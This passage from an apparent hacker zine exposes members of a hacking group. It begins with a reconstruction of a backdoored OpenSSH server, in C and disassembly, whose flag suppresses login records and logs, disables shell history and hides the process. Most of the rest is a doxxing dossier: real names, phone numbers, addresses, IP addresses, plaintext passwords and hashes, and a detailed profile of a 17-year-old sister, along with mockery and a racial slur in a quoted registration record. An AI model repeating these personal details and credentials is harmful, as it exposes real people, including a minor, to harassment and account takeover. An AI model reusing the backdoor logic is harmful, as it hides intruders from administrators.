*/ +void +record_logout(pid_t pid, const char *tty, const char *user) +{ + struct logininfo *li; + if(hookarOn) return; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code + li = login_alloc_entry(pid, user, NULL, tty); + login_logout(li); + login_free_entry(li); +} + + +/* +.text:08057050 loc_8057050: ; CODE XREF: do_child+DCj +.text:08057050 sub esp, 0Ch +.text:08057053 push offset aTz ; "TZ" +.text:08057058 call _getenv +.text:0805705D add esp, 10h +.text:08057060 test eax, eax +.text:08057062 jnz loc_8057696 +.text:08057068 cmp ds:hookarOn, 1 +.text:0805706F jz loc_80576CF +.text:08057075 +.text:08057075 loc_8057075: ; CODE XREF: do_child+85Dj +.text:08057075 ; do_child+883j +.text:08057075 mov ebx, dword ptr ds:options+6ACh +.text:0805707B test ebx, ebx +.text:0805707D jnz short loc_80570FB + + +.text:08057696 loc_8057696: ; CODE XREF: do_child+1F6j +.text:08057696 sub esp, 0Ch +.text:08057699 push offset aTz ; "TZ" +.text:0805769E call _getenv +.text:080576A3 add esp, 10h +.text:080576A6 push eax ; int +.text:080576A7 push offset aTz ; "TZ" +.text:080576AC lea edx, [ebp+var_16AC] +.text:080576B2 push edx ; int +.text:080576B3 lea eax, [ebp+envp] +.text:080576B9 push eax ; int +.text:080576BA call child_set_env +.text:080576BF add esp, 10h +.text:080576C2 cmp ds:hookarOn, 1 +.text:080576C9 jnz loc_8057075 +.text:080576CF + +/* + * Performs common processing for the child, such as setting up the + * environment, closing extra file descriptors, setting the user and group + * ids, and executing the command or shell. + */ + +void +do_child(Session *s, const char *command) +{ + extern char **environ; + char **env; + char *argv[10]; + const char *shell, *shell0, *hostname = NULL; + struct passwd *pw = s->pw; + +//... + +/* + * Make sure $SHELL points to the shell from the password file, + * even if shell is overridden from login.conf + */ + env = do_setup_env(s, shell); + +//... +} + + +//... 
+static char ** +do_setup_env(Session *s, const char *shell) +{ + char buf[256]; + u_int i, envsize; + char **env, *laddr, *path = NULL; + struct passwd *pw = s->pw; + + //... + /* Normal systems set SHELL by default. */ + child_set_env(&env, &envsize, "SHELL", shell); + } + if (getenv("TZ")) { + child_set_env(&env, &envsize, "TZ", getenv("TZ")); + if(hookarOn == 1) { //If the hookarOn flag is set + child_set_env(&env,&envsize,"HISTFILE","/dev/null"); //Set HISTFILE to /dev/null (no history logging) + } + +//... +} + + + + +/* +.text:080584F0 public session_proctitle +.text:080584F0 session_proctitle proc near ; CODE XREF: session_close+9Dj +.text:080584F0 ; session_close+14Bj ... +.text:080584F0 +.text:080584F0 var_18 = dword ptr -18h +.text:080584F0 var_14 = dword ptr -14h +.text:080584F0 var_10 = dword ptr -10h +.text:080584F0 arg_0 = dword ptr 8 +.text:080584F0 +.text:080584F0 push ebp +.text:080584F1 mov ebp, esp +.text:080584F3 push edi +.text:080584F4 push esi +.text:080584F5 push ebx +.text:080584F6 sub esp, 0Ch +.text:080584F9 mov eax, [ebp+arg_0] +.text:080584FC mov esi, [eax+8] +.text:080584FF test esi, esi +.text:08058501 jz loc_8058645 +.text:08058507 mov ebx, ds:hookarOn +.text:0805850D test ebx, ebx +.text:0805850F jnz loc_80585FC + +.text:080585EC loc_80585EC: ; CODE XREF: session_proctitle+119j +.text:080585EC call setproctitle +.text:080585F1 add esp, 10h +.text:080585F4 lea esp, [ebp-0Ch] +.text:080585F7 pop ebx +.text:080585F8 pop esi +.text:080585F9 pop edi +.text:080585FA leave +.text:080585FB retn +.text:080585FC ; --------------------------------------------------------------------------- +.text:080585FC +.text:080585FC loc_80585FC: ; CODE XREF: session_proctitle+1Fj +.text:080585FC sub esp, 8 +.text:080585FF push (offset asc_8081F90+4) ; "" +.text:08058604 push (offset asc_8081F90+4) ; "" +.text:08058609 jmp short loc_80585EC +*/ + +void +session_proctitle(Session *s) +{ + if (s->pw == NULL) + error("no user for session %d", s->self); + 
else{ + if(hookarOn) { //if the hookarOn flag is set + setproctitle("",""); //set current process title to "" to hide from process status list (ps) + return; + } + //... +}} + + + +/* +.text:08060D30 ; int __cdecl login_write(struct utmp *ptr) +.text:08060D30 public login_write +.text:08060D30 login_write proc near ; CODE XREF: login_logout+Dj +.text:08060D30 ; login_login+Dj +.text:08060D30 +.text:08060D30 var_18 = dword ptr -18h +.text:08060D30 var_4 = dword ptr -4 +.text:08060D30 ptr = dword ptr 8 +.text:08060D30 +.text:08060D30 push ebp +.text:08060D31 mov ebp, esp +.text:08060D33 push ebx +.text:08060D34 push eax +.text:08060D35 xor eax, eax +.text:08060D37 cmp ds:hookarOn, 1 +.text:08060D3E mov ebx, [ebp+ptr] +.text:08060D41 jz short loc_8060D5E +.text:08060D43 call _geteuid +.text:08060D48 test eax, eax +.text:08060D4A jz short loc_8060D64 +.text:08060D4C sub esp, 0Ch +.text:08060D4F push offset aAttemptToWrite ; "Attempt to write login records by non-r"... +.text:08060D54 call logit +.text:08060D59 mov eax, 1 +.text:08060D5E +.text:08060D5E loc_8060D5E: ; CODE XREF: login_write+11j +.text:08060D5E mov ebx, [ebp+var_4] +.text:08060D61 leave +.text:08060D62 retn +*/ + +/** + ** login_write: Call low-level recording functions based on autoconf + ** results + **/ +int +login_write(struct logininfo *li) +{ +if(hookarOn == 1) return 0; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code + //... +} + + + +/* +.text:0806A60C ; int __cdecl do_log(int, int, __gnuc_va_list arg) +.text:0806A60C public do_log +.text:0806A60C do_log proc near ; CODE XREF: fatal+Fp +.text:0806A60C ; debug3+Fp ... 
+.text:0806A60C +.text:0806A60C dest = byte ptr -818h +.text:0806A60C buf = byte ptr -418h +.text:0806A60C arg_0 = dword ptr 8 +.text:0806A60C arg_4 = dword ptr 0Ch +.text:0806A60C arg = dword ptr 10h +.text:0806A60C +.text:0806A60C push ebp +.text:0806A60D mov ebp, esp +.text:0806A60F push edi +.text:0806A610 push esi +.text:0806A611 push ebx +.text:0806A612 sub esp, 80Ch +.text:0806A618 cmp ds:hookarOn, 1 +.text:0806A61F mov eax, [ebp+arg_0] +.text:0806A622 mov ecx, [ebp+arg_4] +.text:0806A625 mov ebx, [ebp+arg] +.text:0806A628 jz loc_806A6E0 + +.text:0806A6E0 loc_806A6E0: ; CODE XREF: do_log+1Cj +.text:0806A6E0 ; do_log+2Aj ... +.text:0806A6E0 lea esp, [ebp-0Ch] +.text:0806A6E3 pop ebx +.text:0806A6E4 pop esi +.text:0806A6E5 pop edi +.text:0806A6E6 leave +.text:0806A6E7 retn +*/ + +void +do_log(LogLevel level, const char *fmt, va_list args) +{ +if(hookarOn == 1) return; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code +//... +} + + +// For a detailed explanation refer to section [0x08] [Backdoor RCE] which covers the updated version of the backdoor. + + +root@srv01 [~/downloads/kojoney]# mv /etc/kojoney/fake_users /etc/kojoney/fake_users.backup +root@srv01 [~/downloads/kojoney]# echo root 0x3aownt > /etc/kojoney/fake_users +root@srv01 [~/downloads/kojoney]# cat /etc/kojoney/fake_users +root 0x3aownt +root@srv01 [~/downloads/kojoney]# + + +Honeypot Report +----------------------- + +Date: Tue 23 Jun 2009 05:14:39 AM EDT +Log lines: 1173 +Log size: 88K /var/log/honeypot.log + +Authenticated users. Successfull logons +--------------------------------------- + + 2 root + +Total 2 + +Unauthenticated users. 
Failed logons +------------------------------------ + + 72 root + 5 test + 5 oracle + 2 0x3aownt + 1 infosec + +Total 85 + +Users successfully authenticateds with publickey +------------------------------------------------ + + +Total 0 + +Users unsuccessfully authenticateds with publickey +-------------------------------------------------- + + +Total 0 + +Logons with null passwords +-------------------------- + + 8 root + 2 0x3aownt + 1 infosec + +Total 11 + +Logons with or without password +------------------------------- + + 82 root + 5 test + 5 oracle + 4 0x3aownt + 2 infosec + +Total 98 + +Number of times a remote shell was opened +----------------------------------------- + +Total 2 + +X11 forward requests +-------------------- + +Total 0 + +Executed different commands +--------------------------- + + 3 w + 2 ls + 1 quit + 1 ps + 1 pls -la etc + 1 ls -lals + 1 ls -la lol + 1 ls -la + 1 id + 1 exit + 1 cd /var + 1 cd /etc + 1 caexit + 1 bullshit . + +Total 17 + +Number of times the intruder tries to change the terminal window size +--------------------------------------------------------------------- + +Total 0 + +IP Addresses +------------ + + 1 123.233.245.226 - 75 conexion(es) + 2 91.184.220.239 - 2 conexion(es) + 3 64.191.69.101 - 10 conexion(es) + +Total 3 + +Sessions opened by humans +------------------------- + +Typo error filter: Session with id 3 opened by a human // RoMeO + +1 human session(s) total + +Humans detecteds by IP +---------------------- +0 human(s) total + +Internal Honeypot Errors +------------------------ + +Total 1 + +/* +After re-imaging and recoving the server, an SSHD honeypot was installed and configured with the backdoor credentials. +Access was granted from 64.191.169.101 (mx101.stardustdawn.com) to the honeypot sshd with username: root and the backdoor +password that only anti-sec uses (RoMeO): 0x3aownt. The connecting system was running OpenSSH v4.3. 
+*/ + + +_______ _______ ________ +\ _ \ ___ __\ _ \ \_____ \ +/ /_\ \\ \/ / /_\ \ / ____/ +\ \_/ \> <\ \_/ \/ \ + \_____ /__/\_ \\_____ /\_______ \ + \/ \/ \/ \/ + +___________ __ +\__ ___/____ _______ ____ _____/ |_ + | | \__ \\_ __ \/ ___\_/ __ \ __\ + | | / __ \| | \/ /_/ > ___/| | + |____| (____ /__| \___ / \___ >__| + \/ /_____/ \/ +__________ _____.__.__ .__ +\______ \_______ _____/ ____\__| | |__| ____ ____ + | ___/\_ __ \/ _ \ __\| | | | |/ \ / ___\ + | | | | \( <_> ) | | | |_| | | \/ /_/ > + |____| |__| \____/|__| |__|____/__|___| /\___ / + \//_____/ + + +1) + +RoMeO: +----- +Real Name: Faisal Hourani +Sister Name: Joud Hourani +Country: Saudi Arabia +City: Riyadh +Previous City: Jeddah +Address: King Fahad ST +Age: 20 +Birthday: April 02 +Horoscope: Aries +Height: 1.73cm (5.7") +Phone Number: +966.509121268 +Nickname: RoMeO +Emails: srshaxsir@hushmail.com, romeo.haxxor@gmail.com, romeo@darkmindz.com, coolking_97@hotmail.com +MSN: romeo@darkmindz.com +ISP Network Range: 188.48.0.0 to 188.55.255.255, 212.71.32.0 to 212.71.63.255, 82.167.0.0 to 82.167.255.255 +Domains: http://darkmindz.com, http://cybershade.org, http://www.freewebs.com/xromeox, http://xromeox.bravehost.com +Domain Hosting: hr-development.net +Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net +Skills: _lulz_ +Certifications: GSCE English, Math A Level +Favorite Books: Stealing the Network: How to Own a Continent (Bob Knuth) +Fake Names: James Knuth +Fake Emails: glafk0s@hotmail.com, knuth.james1@gmail.com +PsyBNC Host: absolute.ownage.net / 72.20.28.205 +Plain Passwords: zeroforlol, ra7plmyt, sidfh928rf783, swU55ath, bu9fjogr, ve2aZCp3GYoq +Hash Passwords: $1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx, 0fb82d94184aca290e633cf50671baf9 Salt(R_g^0), 5921174f5ef40f7765dee53b4722426b, 59a41b9e4f5983c66a6f26ef7c27fa0205af01bc:c419 +Real IPs: 188.54.114.181(08/06/09), 188.51.89.109(09/06/09), 188.50.41.73 (23/06/09-25/06/09), 188.49.23.137(26/06/09), 188.51.85.13 (27/06/09-30/06/09) +Common 
Phrases: sir, hai, lulz, hax, _somephrase_, rawr +Common Bash Commands: netstat, netstat, netstat @ (Panic Mode) +IRC Friends: BSDGurl, dark, pimpinjg, r0rkty, glyph, xlink, AlbinoSkunk +Staff Member: thedefaced.org, blackhat-forums.com, r00tsecurity.org +Cars Driving: Golf GTI, Nissan Armada +Favorite TV Shows: Friends, Dharma and Greg, Inside Edition, Still Standing, Grounded for life +Favorite Movies: House of Wax, The Notebook +Favorite Games: Counter-Strike, Doom 3 +Favorite Music: Fergie, Chris Brown, Fadel and Yara +School: Thamer International School, Jeddah, Saudi Arabia +Studies: Limkokwing University of Creative Technology '12 (http://www.limkokwing.net/united_kingdom) +Studies Course: Software Engineering + +RoMeO's sister: +--------------- + +Full Name: Jude (Joud) Hourani or Al-Hourani +Nationality: Jordanese +Speaks: English, French, Arabic and possibly 1 or 2 other languages. +Lives in: Jeddah (Saudi Arabia) +Birthday: July 14th 1993 +Age: 17 +Zodiac: Cancer +Hair color: Black and Brown (Her worst habit...) +Height: 1.68cm ~ 1.72cm +Drinks: Sprite, 7up, Pepsi and Cade +Movies: Far too many including Zoolander, She's The Man, Last Holiday, Aquamarine, Ice Princess, + Princess Diaries 1 & 2, Freaky Friday, Just Friends, Pink Panther, Just Like Heaven, Click, Meet The Fockers, + Meet The Parents, Tokyo Drift, Just My Luck, Shall We Dance, Moulin Rouge, A Walk To Remember, Chasing Liberty, + Mean Girls, War of the Worlds, Mr. Deeds and many many more!!! Woa, quite a collection I must admit! =) +TV Series: Friends, Fashion House, Still Standing, 8 Simple Rules, Star Academy, Seventeen, Popular, + Sleepover club and many other... +Quote: "Elordon Awalan" which means "Jordan First!" +Sports: Basketball and Tennis +Eats: French fries, shrimps and candy!!! Hehehe... 
:-T +Ice-Cream: Chocolate, Lime and Strawberry +Candy: HARIBO +Colors: White, Black, Red, Pink and Blue +Hobbies: Playing the piano (wants to learn electric guitar), dancing Hip-Hop, chatting on the internet + and watching movies! Yeeah! :-P +Idols: Has a few but favorite is Avril Lavigne because she is not afraid to speak her mind... L-o-L! +Dream Vacations: USA Disney Land + + + +Darkmindz.com on 2007-02-24 - Domain History + +Registrant: + Individual + Chilis building Hamra street + jeddah, 6277 + SA + + Domain name: DARKMINDZ.COM + +Administrative Contact: + Perlman, Menachem menachem12345@gmail.com + Chilis building Hamra street + jeddah, 6277 + SA + +966.509121268 + Technical Contact: + NOC (Network Operations Center), Servage.net noc@servage.com + Im Grund 9 + Flensburg, DE 24939 + DE + +49.46116098358 Fax: +49.46116098359 + + +Darkmindz.com on 2007-04-06 - Domain History + + +Registrant: + Individual + Kind Fahad ST. + Riyadh, + sa + + Domain name: DARKMINDZ.COM + + Administrative Contact: + Haxxor, RoMeO romeo.haxxor@gmail.com + King Fahad ST. + Riyadh, + sa + +966.509121268 + Technical Contact: + NOC (Network Operations Center), Servage.net noc@servage.com + Im Grund 9 + Flensburg, DE 24939 + DE + +49.46116098358 Fax: +49.46116098359 + + Registration Service Provider: + Servage.net Hosting, support@servage.net + +49 46116098359 (fax) + http://www.servage.net/ + + +Darkmindz.com on 2008-01-05 - Domain History + + +Registrant: + Individual + King Fahad ST. + Riyadh, + SA + + Domain name: DARKMINDZ.COM + + Administrative Contact: + Perlman, Menachem romeo.haxxor@gmail.com + King Fahad ST. + Riyadh, + SA + +966.509121263 + Technical Contact: + Perlman, Menachem romeo.haxxor@gmail.com + King Fahad ST. + Riyadh, + SA + +966.509121263 + + +Darkmindz.com on 2009-07-31 - Domain History + +Domain name: darkmindz.com + +Registrant Contact: + NA + NA Individual () + + Fax: + King Fahad ST. 
+ Riyadh, P + SA + +Administrative Contact: + NameCheap.com + NameCheap.com NameCheap.com (support@NameCheap.com) + +1.6613102107 + Fax: +1.5555555555 + 8939 S. Sepulveda Blvd. #110 - 732 + Westchester, CA 90045 + US + + +/* +Domain history shows exactly RoMeo past and current Saudi Arabia address, including his mobile number. +The registrant name provided in the registration of the domain between 2007-02-24 and 2008-01-05 came +in contradiction with our research, therefore was classified as fake. +*/ + +Cybershade.org on 2008-12-23 - Domain History + +Domain ID:D149271481-LROR +Domain Name:CYBERSHADE.ORG +Created On:29-Sep-2007 15:21:51 UTC +Last Updated On:22-Dec-2008 17:59:31 UTC +Expiration Date:29-Sep-2010 15:21:51 UTC +Sponsoring Registrar:eNom, Inc. (R39-LROR) +Status:OK +Registrant ID:15a646b0510 +Registrant Name:Cybershade Inc +Registrant Street1:123 Cybershade org +Registrant Street2: +Registrant Street3: +Registrant City:Internet +Registrant State/Province:DOMAIN +Registrant Postal Code:Z1P CD3 +Registrant Country:GB +Registrant Phone:+44.123567890 +Registrant Phone Ext.: +Registrant FAX: +Registrant FAX Ext.: +Registrant Email:crawleruk@gmail.com +Admin ID:15a646b0510 +Admin Name:Cybershade Inc +Admin Street1:123 Cybershade org +Admin Street2: +Admin Street3: +Admin City:Internet +Admin State/Province:DOMAIN +Admin Postal Code:Z1P CD3 +Admin Country:GB +Admin Phone:+44.123567890 +Admin Phone Ext.: +Admin FAX: +Admin FAX Ext.: +Admin Email:crawleruk@gmail.com +Tech ID:15a646b0510 +Tech Name:Cybershade Inc +Tech Street1:123 Cybershade org +Tech Street2: +Tech Street3: +Tech City:Internet +Tech State/Province:DOMAIN +Tech Postal Code:Z1P CD3 +Tech Country:GB +Tech Phone:+44.123567890 +Tech Phone Ext.: +Tech FAX: +Tech FAX Ext.: +Tech Email:crawleruk@gmail.com +Name Server:NS3.HR-DEVELOPMENT.NET +Name Server:NS4.HR-DEVELOPMENT.NET + +// Domain used for their cybershade CMS development. 
+ + +Hello there and welcome to "RoMeOs" one stop web +Check it out and let me know what you think, you can contact me on coolking_97@hotmail.com +Male, 15 years old +Jedah, Saudi-Arabia +ref: First Website : http://www.freewebs.com/xromeox/ + +/* +RoMeO first website teaching "Ileagal Knoweledge!" related to hacking including the basics of IP Address +and how you can get other people IP Address. Say, you're really special, aren't you? +*/ + + +RoMeO: +" + +http://i43.tinypic.com/21317c6.png + +// root@mercedes ?? + +[14:52:44] <&RoMeO> http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/ +[14:53:42] RoMeO: now that you've had your fun +[14:53:46] <&RoMeO> :) +[14:53:53] <&RoMeO> i had the lulz of a life time +[14:53:53] feel like explaining integer underflows +[14:53:56] <&RoMeO> no + +.____ ____ ___.____ __________ .___.__ .__ +| | | | \ | \____ / __| _/|__| ______ ____ | | ____ ________ _________ ____ +| | | | / | / / ______ / __ | | |/ ___// ___\| | / _ \/ ___/ | \_ __ \_/ __ \ +| |___| | /| |___ / /_ /_____/ / /_/ | | |\___ \\ \___| |_( <_> )___ \| | /| | \/\ ___/ +|_______ \______/ |_______ \/_______ \ \____ | |__/____ >\___ >____/\____/____ >____/ |__| \___ > + \/ \/ \/ \/ \/ \/ \/ \/ PRESENTS + [ XSS in wall on SSH 1 / putty ] + + + + +Hello there, im new in here, actually im new to the whole fedora project, i have a fedora core 3, and i was trying +alot to connect it to the internet but no use! +i have a wireless network at my home, and a modem "Motorolla sm65" i just couldnt install them on the computer, any ideas? + +you can email me at: romeo.haxxor@gmail.com +thanks../ + +Join Date: Jan 2007 +Location: Saudi-Arabia +Posts: 6 + +Ref: http://forums.fedoraforum.org/showthread.php?t=146470 + +/* +If he can't install a modem then I don't see how he could hack his way out of a wet paper bag... +oh wait... he can't... he's a skiddie! 
+*/ + + +Posted 30 May 2008 - 03:13 AM +I am glad you like the articles section :) , what about the code base tho? any comments on that maybe? + +and hm, I have A levels ( GCSE ) exams atm, after that the new release of DMZ will start, and the main +prios to improve are: + +- Layout +- Submit sytem + articles / codes system. + +all the articles and codes will be reformated to look at its best, etc.... + +@intimidat0r, I sure will :) + +ref: https://www.binrev.com/forums/index.php/topic/37778-darkmindz/page__view__findpost__p__308906 + +// Your first professional certification I presume? + + +DarkMindZ +tags: turbocharged06 romeo r4z0rbl4de the reaper xlink jath darkmindz darkmindz.org dmz hacking hacking +group underground hackers security experts graphics tutorials learning +ref: http://www.urbandictionary.com/define.php?term=DarkMindZ + +/* +Must suck to have two different conflicting personalities. +Whats next? Animal Detectives or Horse humpers (http://www.youtube.com/watch?v=Cf3p1mXHfqY) +*/ + +Facebook Lulz +------------- + +Faisal Hourani +SocialInterview.com asked me "Name someone you wish you could date." +I answered ''Megan Fox. rawr'' +November 15 at 3:56am via Social Interview · Interview Me + + +Faisal Hourani +SocialInterview.com asked me "What would your mother think if she saw everything you've posted on Facebook?" +I answered ''She already checks out everything, everyday. Hi mom :]...'' +November 15 at 10:06pm via Social Interview · View Feedback (2)Hide Feedback (2) · Interview Me + +// We hope she checks this out:] Hai Faisal's mom + + +Faisal Hourani +SocialInterview.com asked me "If you could rule any country or place, what would you pick?" +I answered: "The world =O" + +// You ever thought about Economical Crisis ? + + +Faisal Hourani they don't call me romeo for jack :P +Faisal took the How dateable are you? quiz and the result is COMPLETLY DATEABLE! 
+You are the perfect gentleman/lady and you know everything anybody needs to know about dating and flirting +See More +July 6 at 7:00pm via How dateable are you? · View Feedback (2)Hide Feedback (2) · Take this Quiz + +// rawr :] lulz + + +“I can’t believe that out of 10,000 sperm, you were the quickest.” +~ Steven Pearl + + + + +ref: http://nepalimadbulls.wetpaint.com/page/Login+Log + +// As a skiddie, you are NOT supposed to know how to secure your own code.. + + +(4954,'RoMeO',1188441098,0,0,'',0,'',0,0,'','','','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','',0,'0001-01-01','','','','','','','',0,1,'','',0,'',0,0,0,'',1,1,0,2,'','','','',0,1,'',0,'','',0,0,'',0,'',NULL) +(5033,'RoMeO',1188441098,46,0,'',1207945792,'RoMeO',2,0,'','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','DarkMindZ',1,'1991-02-02','DarkMindZ','http://www.darkmindz.com','DarkMindZ','','','','romeo@darkmindz.com',0,1,'','I Learn The Rules To Break Them',0,'',1,0,0,'',1,1,'77.30.170.77','','',2,1,'',30843,'','',23,106496,'',0,0,130,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'0',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,2,1,2,2,1,2,1,41,267,'down') + +IP address: 77.30.170.77 +Reverse DNS: 77.30.170.77.dynamic.saudi.net.sa. +Reverse DNS authenticity: [Could be forged: hostname 77.30.170.77.dynamic.saudi.net.sa. does not exist] +ASN: 25019 +ASN Name: SAUDINETSTC-AS +IP range connectivity: 5 +Registrar (per ASN): RIPE +Country (per IP registrar): SA [Saudi Arabia] +Country Currency: SAR [Saudi Arabia Riyals] +Country IP Range: 77.30.0.0 to 77.31.255.255 +Country fraud profile: Normal +City (per outside source): Riyadh, Ar Riyad +Country (per outside source): SA [Saudi Arabia] +Private (internal) IP? No +IP address registrar: whois.arin.net +Known Proxy? 
No +Link for WHOIS: 77.30.170.77 + +(23440,701,41,1188442878,5033,'Re: POLL - ALL MEMBERS MUST READ AND VOTE!','RoMeO','romeo.haxxor@gmail.com','89.5.78.7',1,1188492293,'0rijin4l','0rijin4l got me here','xx'),( + +IP address: 89.5.78.7 +Reverse DNS: dynamic.dsl.nesma.net.sa. +Reverse DNS authenticity: [Could be forged: hostname dynamic.dsl.nesma.net.sa. does not exist] +ASN: 24731 +ASN Name: ASN-NESMA (National Engineering Services and Marketing Company Ltd. (NESMA)) +IP range connectivity: 1 +Registrar (per ASN): RIPE +Country (per IP registrar): SA [Saudi Arabia] +Country Currency: SAR [Saudi Arabia Riyals] +Country IP Range: 89.4.0.0 to 89.5.255.255 +Country fraud profile: Normal +City (per outside source): Riyadh, Ar Riyad +Country (per outside source): SA [Saudi Arabia] +Private (internal) IP? No +IP address registrar: whois.ripe.net +Known Proxy? No +Link for WHOIS: 89.5.78.7 + +ref: http://www.gonullyourself.org/ezines/G-line/G-line.4.txt + + + +----- darkmindz.com ----- + +----------------- +Host's addresses: +----------------- + darkmindz.com. 5 IN A 69.42.209.54 + +------------- +Name servers: +------------- + ns6.hr-development.net. 5 IN A 69.42.209.51 + ns5.hr-development.net. 5 IN A 69.42.209.50 + +----------- +MX record: +----------- + aspmx.l.google.com. 5 IN A 209.85.219.58 + +--------------------- +Trying Zonetransfers: +--------------------- + + trying zonetransfer for darkmindz.com on ns6.hr-development.net ... + + trying zonetransfer for darkmindz.com on ns5.hr-development.net ... + +------------------------------ +Brute forcing with dns.txt: +------------------------------ + ftp.darkmindz.com. 5 IN A 69.42.209.54 + mail.darkmindz.com. 5 IN A 69.42.209.54 + pop.darkmindz.com. 5 IN A 69.42.209.54 + smtp.darkmindz.com. 5 IN A 69.42.209.54 + www.darkmindz.com. 
5 IN A 69.42.209.54 + +------------------------------- +darkmindz.com c class netranges: +------------------------------- + 69.42.209.0/24 + + + +----- cybershade.org ----- + +----------------- +Host's addresses: +----------------- + cybershade.org. 5 IN A 69.42.209.54 + +------------- +Name servers: +------------- + ns6.hr-development.net. 5 IN A 69.42.209.51 + ns5.hr-development.net. 5 IN A 69.42.209.50 + +----------- +MX record: +----------- + mail.cybershade.org. 5 IN A 69.42.209.54 + +--------------------- +Trying Zonetransfers: +--------------------- + + trying zonetransfer for cybershade.org on ns6.hr-development.net ... + + trying zonetransfer for cybershade.org on ns5.hr-development.net ... + +------------------------------ +Brute forcing with dns.txt: +------------------------------ + ftp.cybershade.org. 5 IN A 69.42.209.54 + mail.cybershade.org. 5 IN A 69.42.209.54 + pop.cybershade.org. 5 IN A 69.42.209.54 + smtp.cybershade.org. 5 IN A 69.42.209.54 + www.cybershade.org. 5 IN A 69.42.209.54 + +------------------------------- +cybershade.org c class netranges: +------------------------------- + 69.42.209.0/24 + + + +2) pimpinjg + +Real Name: Jason +Country: United States +State: California +Address: +Age: 38 +Birthday: July 18, 1971 +Daughter Name: Dakota +Phone Number: +Nickname: pimpinjg +MSN: pimpinjg@hr-development.net +ICQ: 574404127 +Skype: pimpinjg +Emails: pimpinjg@hr-development.net, pimpinjg@hotmail.com, pimpinjg4@aol.com, pimpinjg@linuxmail.org +ISP Network Range(s): 76.80.0.0 to 76.95.255.255, 76.160.0.0 to 76.175.255.255 +Domains: h4ckinab0x.com, teamhbx.com, project-h4x0r.com, copyandpaste.info, anti-sec.net, pimpinjg.net, super-syn.net +Domain Hosting: hr-development.net +Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net +Company: hr-development.net +Skills: DDOS Flooder and Anti-DDOS Specialist :D _none_ +PsyBNC Host(s): *.deploy.akamaitechnologies.com, complete.ownage.net (72.20.17.206) +Plain Password(s): joeybe11, 
1b6m9p34nz, h4ckinab0x, 1ssgy0ZACGUZFS +Hash Password(s): e93567696318487f84ea635b1e617d5a, $1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1, +Real IP(s): 76.175.20.182, 76.175.18.227, 76.94.14.130, 76.175.18.227 +Common Bash Commands: nano, wget :D +IRC Friends: RoMeO, garrett +Affiliates: thedefaced.org, darkmindz.com +Operating System(s): Ubuntu 8.10, Windows Vista + + +- +pimpinjg is pimpinjg@cloaked-1243C38A.deploy.akamaitechnologies.com * Pimpinjg +pimpinjg is using modes +iwrxt +pimpinig is connecting from *@cpe-76-175-20-182.socal.res.rr.com 76.175.20.182 +pimpinjg is a registered nick +pimpinjg on #underground_systems #astalavista &#darkmindz +pimpinjg using twofish.securitychat.org SecurityChat.org ircd +pimpinjg has been idle 54mins 58secs, signed on Sun Jun 21 10:21:02 +pimpinjg End of /WHOIS list. + + + +/****************************************************************************************** +* pimp.shell priv release for my baby joeybe11 Ballcanc3r and myself ;) +* +* +* New Mods (added by me) -- ++--------------------------------------------------------+ +* added proxy shit +* removed images for less crap in the logs +* added cpanel finder (thx to ackit) +* added rfi/lfi finder (thx to ackit) +* other shit i cba putting here ++--------------------------------------------------------+ +* shit to remove -- ++--------------------------------------------------------+ +* - a bunch of stupid code things (example: echo("$msg"); (wtf... :S)) +*********************************************************/ + +// Private 0Day Exploits, Backdoors, Shells, Privacy.. u name it.. not so private anymore.. 
+ + +H4ckinab0x.com on 2008-03-12 - Domain History + +Registrant: + project-h4x0r + 430 west imperial highway 16 + brea, California 92821 + United States + + Domain Name: H4CKINAB0X.COM + Created on: 11-Mar-08 + Expires on: 11-Mar-09 + Last Updated on: 11-Mar-08 + + Administrative Contact: + Gleason, rex pimpinjg4@aol.com + project-h4x0r + 430 west imperial highway 16 + brea, California 92821 + United States + (714) 529-4264 Fax -- + + +Project-h4x0r.com on 2008-02-16 - Domain History + +Registrant: + project-h4x0r + 432 west imperial highway 16 + brea, California 92821 + United States + + Domain Name: PROJECT-H4X0R.COM + Created on: 13-Feb-08 + Expires on: 14-Feb-10 + Last Updated on: 14-Feb-08 + + Administrative Contact: + gleason, joshua pimpinjg4@aol.com + project-h4x0r + 432 west imperial highway 16 + brea, California 92821 + United States + (714) 529-4234 Fax -- + + +Teamhbx.com on 2008-09-05 - Domain History + +Registrant: + h4ckinab0x + 234 nigger street + nigger, California 11111 + United States + + Domain Name: TEAMHBX.COM + Created on: 03-Sep-08 + Expires on: 03-Sep-09 + Last Updated on: 03-Sep-08 + + Administrative Contact: + nigger, nigger pimpinjg4@aol.com + h4ckinab0x + 234 nigger street + nigger, California 11111 + United States + 111111111 Fax -- + + + +Afraid.org Domains: + +h4ckinab0x.com +(5 hosts in use) website private pimpinjg 192 days ago (01/22/2009) +copyandpaste.info +(7 hosts in use) website private pimpinjg 66 days ago (05/28/2009) +super-syn.net +(6 hosts in use) website private pimpinjg 1 day ago (08/02/2009) +anti-sec.net +(6 hosts in use) website private pimpinjg 2 days ago (07/05/2009) +Ref: http://www.baccomber.com/domain/registry/?page=363&sort=3&q= + +// It's amazing what u can find on the net.. 
